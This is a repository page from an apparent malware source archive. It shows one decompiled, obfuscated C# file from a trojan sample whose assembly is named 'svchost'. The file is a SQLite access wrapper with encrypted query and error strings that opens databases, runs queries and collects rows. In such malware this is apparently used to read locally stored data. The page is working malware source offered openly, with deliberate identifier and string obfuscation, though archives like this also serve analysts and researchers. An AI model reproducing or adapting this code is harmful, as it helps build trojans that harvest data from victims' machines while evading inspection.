ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 09:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/R/Trojan.Win32.Reconyc.efsu-49381cd9042bc3cc4ed4ef172003f6330ee39256d57a554e08499cf3b3054e87/_003F16_003F.cs

244 lines
10 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: ?1?.?16?
// Assembly: svchost, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 0572F6A4-2AE0-441B-8B88-3FB3343AE211
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Reconyc.efsu-49381cd9042bc3cc4ed4ef172003f6330ee39256d57a554e08499cf3b3054e87.exe
using \u003F1\u003F;
using System;
using System.Collections;
using System.Data;
using System.Runtime.InteropServices;
using System.Text;
namespace \u003F1\u003F
{
public class \u003F16\u003F
{
private const int \u003F184\u003F = 101;
private const int \u003F185\u003F = 0;
private const int \u003F186\u003F = 100;
private IntPtr \u003F122\u003F;
public \u003F16\u003F() => this.\u003F122\u003F = IntPtr.Zero;
public \u003F16\u003F(string _param1) => this.\u003F57\u003F(_param1);
public void \u003F49\u003F()
{
if (!(this.\u003F122\u003F != IntPtr.Zero))
return;
\u003F16\u003F.\u003F61\u003F(this.\u003F122\u003F);
}
public void \u003F50\u003F(string _param1)
{
IntPtr num;
\u003F16\u003F.\u003F71\u003F(this.\u003F122\u003F, this.\u003F76\u003F(_param1), IntPtr.Zero, IntPtr.Zero, out num);
if (num != IntPtr.Zero)
throw new Exception(\u003F195\u003F.\u003F196\u003F("dŒɭͱѯԼ٬ݳ\u086D॰\u0A37\u0B73౭\u0D71\u0E70ཧၥᅹቡ\u1369ᐭᕢᙤᝤᠤ\u1979ᩲ᭣ᱷᵽḹἢ‣") + _param1 + \u003F195\u003F.\u003F196\u003F("!ģȋ") + this.\u003F58\u003F(\u003F16\u003F.\u003F70\u003F(num)));
}
public DataTable \u003F51\u003F(string _param1)
{
IntPtr num1;
\u003F16\u003F.\u003F74\u003F(this.\u003F122\u003F, this.\u003F76\u003F(_param1), this.\u003F52\u003F(this.\u003F76\u003F(_param1)), out num1, out IntPtr _);
DataTable dataTable = new DataTable();
int num2 = this.\u003F59\u003F(num1, ref dataTable);
while (num2 == 100)
num2 = this.\u003F60\u003F(num1, ref dataTable);
\u003F16\u003F.\u003F72\u003F(num1);
return dataTable;
}
private int \u003F52\u003F(IntPtr _param1) => _param1 == IntPtr.Zero ? 0 : \u003F16\u003F.\u003F56\u003F(_param1);
[DllImport("kernel32", EntryPoint = "GetProcessHeap")]
private static extern IntPtr \u003F53\u003F();
public ArrayList \u003F54\u003F()
{
DataTable dataTable = this.\u003F51\u003F(\u003F195\u003F.\u003F196\u003F("âǵˣϫӮ\u05F8ڋ߄\u08C8\u09C5ૂஆೣ\u0DF6\u0EEC\u0FEFႁᇓዮᏲᓴᗨ\u16FEៅᣴ᧹\u1AE4ᯢᳰᷦẳ\u1FC5⃙⇕⋝⏋⒭◸⛲⟺⣬⦨⫎⯈ⶬ⺤⿶ム㇢㈓㌛㑚㕐㙜㜌㠐㤝㨀㭑㱜㵔㸲㼼䀵䅐䈁䌏䐀䔉䙋䜤䠦䤼䩇䬪䰬䴯並佂偆儓刮匲吴唨嘾圅塼奿娂嬘尜崛帝彲怐愜戃据搞攉昇朏栊検橧欨氤洩渦潢瀇焒牰獳琝畏癊睖硐祌穒筩籁絑繞罂聮腝艎荝葙蕉虙蜊衾襠詢譴豠贄蹗轛遑酅鈿鍗鑓锼阳霽顭饹驵魺鱰鴳鸿鼵ꁧꅹꉪꍹꐪꔥꘫꝅꡛꥌꩂꭔ갥굆깚꼢뀰"));
ArrayList arrayList = new ArrayList();
foreach (DataRow row in (InternalDataCollectionBase) dataTable.Rows)
arrayList.Add((object) row.ItemArray[0].ToString());
return arrayList;
}
[DllImport("kernel32", EntryPoint = "HeapAlloc")]
private static extern IntPtr \u003F55\u003F(IntPtr _param0, uint _param1, uint _param2);
[DllImport("kernel32", EntryPoint = "lstrlen")]
private static extern int \u003F56\u003F(IntPtr _param0);
public void \u003F57\u003F(string _param1)
{
if (\u003F16\u003F.\u003F73\u003F(this.\u003F76\u003F(_param1), out this.\u003F122\u003F) != 0)
{
this.\u003F122\u003F = IntPtr.Zero;
throw new Exception(\u003F195\u003F.\u003F196\u003F("YũɨͶѪԷ١ݼ\u0860ॻਲ\u0B7Eౠ൪\u0E60ཤၢᅬሪ\u136Dᑩᕳᙧᝧᡥᥰᩧᬡ") + _param1 + \u003F195\u003F.\u003F196\u003F(" "));
}
}
private string \u003F58\u003F(IntPtr _param1)
{
if (_param1 == IntPtr.Zero)
return (string) null;
Encoding utF8 = Encoding.UTF8;
int length = this.\u003F52\u003F(_param1);
byte[] numArray = new byte[length];
Marshal.Copy(_param1, numArray, 0, length);
return utF8.GetString(numArray, 0, length);
}
private int \u003F59\u003F(IntPtr _param1, ref DataTable _param2)
{
_param2 = new DataTable(\u003F195\u003F.\u003F196\u003F("yůɺͽѫղّݥ\u0861८\u0A64"));
if (\u003F16\u003F.\u003F75\u003F(_param1) == 100)
{
int length = \u003F16\u003F.\u003F63\u003F(_param1);
\u003F195\u003F.\u003F196\u003F("");
object[] objArray = new object[length];
for (int index = 0; index < length; ++index)
{
string columnName = this.\u003F58\u003F(\u003F16\u003F.\u003F66\u003F(_param1, index));
switch (\u003F16\u003F.\u003F69\u003F(_param1, index))
{
case 1:
_param2.Columns.Add(columnName, Type.GetType(\u003F195\u003F.\u003F196\u003F("_Ųɹͽѭժب\u074C\u086Aॷ\u0A31ଳ")));
objArray[index] = (object) \u003F16\u003F.\u003F65\u003F(_param1, index);
break;
case 2:
_param2.Columns.Add(columnName, Type.GetType(\u003F195\u003F.\u003F196\u003F("^ŵɸ;Ѭեةݕ\u086C४\u0A64୮\u0C64")));
objArray[index] = (object) \u003F16\u003F.\u003F64\u003F(_param1, index);
break;
case 3:
_param2.Columns.Add(columnName, Type.GetType(\u003F195\u003F.\u003F196\u003F("^ŵɸ;Ѭեةݕ\u0871ॶ")));
objArray[index] = (object) this.\u003F58\u003F(\u003F16\u003F.\u003F68\u003F(_param1, index));
break;
case 4:
_param2.Columns.Add(columnName, Type.GetType(\u003F195\u003F.\u003F196\u003F("^ŵɸ;Ѭեةݕ\u0871ॶ")));
objArray[index] = (object) this.\u003F58\u003F(\u003F16\u003F.\u003F62\u003F(_param1, index));
break;
default:
_param2.Columns.Add(columnName, Type.GetType(\u003F195\u003F.\u003F196\u003F("^ŵɸ;Ѭեةݕ\u0871ॶ")));
objArray[index] = (object) \u003F195\u003F.\u003F196\u003F("");
break;
}
}
_param2.Rows.Add(objArray);
}
return \u003F16\u003F.\u003F75\u003F(_param1);
}
private int \u003F60\u003F(IntPtr _param1, ref DataTable _param2)
{
int length = \u003F16\u003F.\u003F63\u003F(_param1);
object[] objArray = new object[length];
for (int index = 0; index < length; ++index)
{
switch (\u003F16\u003F.\u003F69\u003F(_param1, index))
{
case 1:
objArray[index] = (object) \u003F16\u003F.\u003F65\u003F(_param1, index);
break;
case 2:
objArray[index] = (object) \u003F16\u003F.\u003F64\u003F(_param1, index);
break;
case 3:
objArray[index] = (object) this.\u003F58\u003F(\u003F16\u003F.\u003F68\u003F(_param1, index));
break;
case 4:
objArray[index] = (object) this.\u003F58\u003F(\u003F16\u003F.\u003F62\u003F(_param1, index));
break;
default:
objArray[index] = (object) \u003F195\u003F.\u003F196\u003F("");
break;
}
}
_param2.Rows.Add(objArray);
return \u003F16\u003F.\u003F75\u003F(_param1);
}
[DllImport("sqlite3", EntryPoint = "sqlite3_close")]
private static extern int \u003F61\u003F(IntPtr _param0);
[DllImport("sqlite3", EntryPoint = "sqlite3_column_blob")]
private static extern IntPtr \u003F62\u003F(IntPtr _param0, int _param1);
[DllImport("sqlite3", EntryPoint = "sqlite3_column_count")]
private static extern int \u003F63\u003F(IntPtr _param0);
[DllImport("sqlite3", EntryPoint = "sqlite3_column_double")]
private static extern double \u003F64\u003F(IntPtr _param0, int _param1);
[DllImport("sqlite3", EntryPoint = "sqlite3_column_int")]
private static extern int \u003F65\u003F(IntPtr _param0, int _param1);
[DllImport("sqlite3", EntryPoint = "sqlite3_column_name")]
private static extern IntPtr \u003F66\u003F(IntPtr _param0, int _param1);
[DllImport("sqlite3", EntryPoint = "sqlite3_column_table_name")]
private static extern IntPtr \u003F67\u003F(IntPtr _param0, int _param1);
[DllImport("sqlite3", EntryPoint = "sqlite3_column_text")]
private static extern IntPtr \u003F68\u003F(IntPtr _param0, int _param1);
[DllImport("sqlite3", EntryPoint = "sqlite3_column_type")]
private static extern int \u003F69\u003F(IntPtr _param0, int _param1);
[DllImport("sqlite3", EntryPoint = "sqlite3_errmsg")]
private static extern IntPtr \u003F70\u003F(IntPtr _param0);
[DllImport("sqlite3", EntryPoint = "sqlite3_exec")]
private static extern int \u003F71\u003F(
IntPtr _param0,
IntPtr _param1,
IntPtr _param2,
IntPtr _param3,
out IntPtr _param4);
[DllImport("sqlite3", EntryPoint = "sqlite3_finalize")]
private static extern int \u003F72\u003F(IntPtr _param0);
[DllImport("sqlite3", EntryPoint = "sqlite3_open")]
private static extern int \u003F73\u003F(IntPtr _param0, out IntPtr _param1);
[DllImport("sqlite3", EntryPoint = "sqlite3_prepare_v2")]
private static extern int \u003F74\u003F(
IntPtr _param0,
IntPtr _param1,
int _param2,
out IntPtr _param3,
out IntPtr _param4);
[DllImport("sqlite3", EntryPoint = "sqlite3_step")]
private static extern int \u003F75\u003F(IntPtr _param0);
private IntPtr \u003F76\u003F(string _param1)
{
switch (_param1)
{
case null:
return IntPtr.Zero;
default:
byte[] bytes = Encoding.UTF8.GetBytes(_param1);
int num1 = bytes.Length + 1;
IntPtr num2 = \u003F16\u003F.\u003F55\u003F(\u003F16\u003F.\u003F53\u003F(), 0U, (uint) num1);
Marshal.Copy(bytes, 0, num2, bytes.Length);
Marshal.WriteByte(num2, bytes.Length, (byte) 0);
return num2;
}
}
public enum \u003F17\u003F
{
\u003F189\u003F = 1,
\u003F188\u003F = 2,
\u003F191\u003F = 3,
\u003F187\u003F = 4,
\u003F190\u003F = 5,
}
}
}
Reference in New Issue Copy Permalink